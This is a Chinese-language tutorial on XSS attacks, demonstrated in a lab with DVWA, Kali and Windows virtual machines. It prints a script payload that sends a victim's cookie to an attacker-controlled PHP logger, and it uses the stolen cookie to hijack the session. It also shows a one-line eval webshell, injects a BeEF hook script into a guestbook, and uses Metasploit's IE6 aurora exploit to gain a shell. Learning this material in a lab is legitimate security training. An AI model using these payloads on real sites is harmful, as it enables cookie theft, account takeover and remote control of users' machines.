文章目录
OWASP TOP 10
XSS
一、XSS漏洞----cookie
1. 盗取cookie
在DVWA靶场上演示。
存在反射型XSS漏洞的站点位置可以利用以下链接来盗取Cookie。
<script>document.location='http://ip/cookie.php文件的绝对路径?cookie='+document.cookie</script>
将连接发送到用户,用户点击即触发XSS漏洞,可以使用URL编码迷惑用户。
cookie.php代码:
<?php
$cookie=$_GET['cookie'];
file_put_contents('usercookie.txt',$cookie);
?>
以DVWA靶场演示:
?uname=<script>document.location='http://192.168.40.129/PHP/XSS-Test/GetCookie/cookie.php?cookie='+document.cookie</script>
提交结果:
2. 利用cookie会话劫持
- 退出登录,bp抓包
- 上传上面盗取的cookie信息,成功登录
3. 会话劫持后的操作
- 进入后台寻找上传点等进一步利用漏洞,如上传一句话Webshell。
- 修改配置等。
上传一句话Webshell:
<?php
@eval($_REQUEST['hello']);
?>
使用中国菜刀
成功得到目标主机的信息:
二、BeEF
使用渗透测试工具BeEF和漏洞框架msf,盗取用户cookie,获得目标主机的shell权。
1. BeEF概述
- BeEF,全称The Browser Exploitation Framework,是一个专注于Web浏览器的渗透测试工具。
- 框架主页:http://beefproject.com/
2. 实验环境
kali(攻击者,IP地址:192.168.40.131)
windows 2008(服务器,IP地址:192.168.40.129)
win 7(受害者,IP地址:192.168.40.128)
3. 实验步骤
- kali虚拟机中修改beef的默认账号和密码(不修改无法启动beef)
工具目录:/usr/share/beef-xss
配置文件:config.yaml
启动beef工具
使用命令 beef-xss
或 /usr/share/beef-xss/beef
web界面管理控制台:http://127.0.0.1:3000/ui/panel
测试页面:http://IP地址:3000/demos/butcher/index.html
shellcode:http://IP地址:3000/hook.js
- 在服务器的留言板上插入beef的shellcode地址
<script src="http://192.168.40.131:3000/hook.js"></script>
- 受害者上线后beef的情况
- 获取cookie
此后我们只需要在浏览器控制台使用 document.cookie="name=tom"
,即可登录
刷新页面,成功登录
三、使用beef和ms漏洞获取shell
1. 实验环境
kali(攻击者,IP地址:192.168.40.131)
windows 2008(服务器,IP地址:192.168.40.129)
win XP(受害者,IP地址:192.168.40.132)
2. 实验步骤
启动msf,利用ms10_220_aurora漏洞(针对IE 6)
设置SRHOST、设置LHOST
exploit,生成一个链接,让受害者访问该链接,这里我们可以直接使用beef让被害者重定向页面:
此时和目标主机建立会话:
查看session并使用session:
获取目标主机的shell:
三、XSS平台
生成了很多代码,包括编码过的,我们选择其中一个插入到留言板中,实现XSS漏洞
当受害者目标主机访问后,就可以监测到。